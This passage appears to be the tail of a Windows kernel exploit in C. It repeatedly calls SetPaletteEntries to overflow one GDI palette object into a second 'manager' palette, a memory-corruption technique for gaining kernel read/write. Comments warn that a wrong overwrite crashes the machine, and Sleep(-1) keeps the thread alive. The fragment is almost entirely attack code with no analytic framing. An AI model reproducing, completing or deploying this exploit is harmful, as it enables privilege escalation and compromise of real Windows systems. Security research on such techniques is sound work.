		memcpy(&rPalette[(palette_overflow_count_until_cEntries / 4) - 8], &manager_palette, sizeof(UINT64));

		// attempt overflow from pwnd_palette into manager_palette
		// if we hit the overwritten object we'll never return from this call
		if (SetPaletteEntries(pwnd_palette, 0, palette_overflow_count_until_cEntries / 4, rPalette) == (palette_overflow_count_until_cEntries / 4))
			break;
	}

	// do not exit main thread if we return from the loop without hitting the overwrite
	// if something else got overwritten you'd just BSOD your machine ;)
	// (-1 becomes the maximum DWORD timeout, so this call does not return)
	Sleep(-1);
}
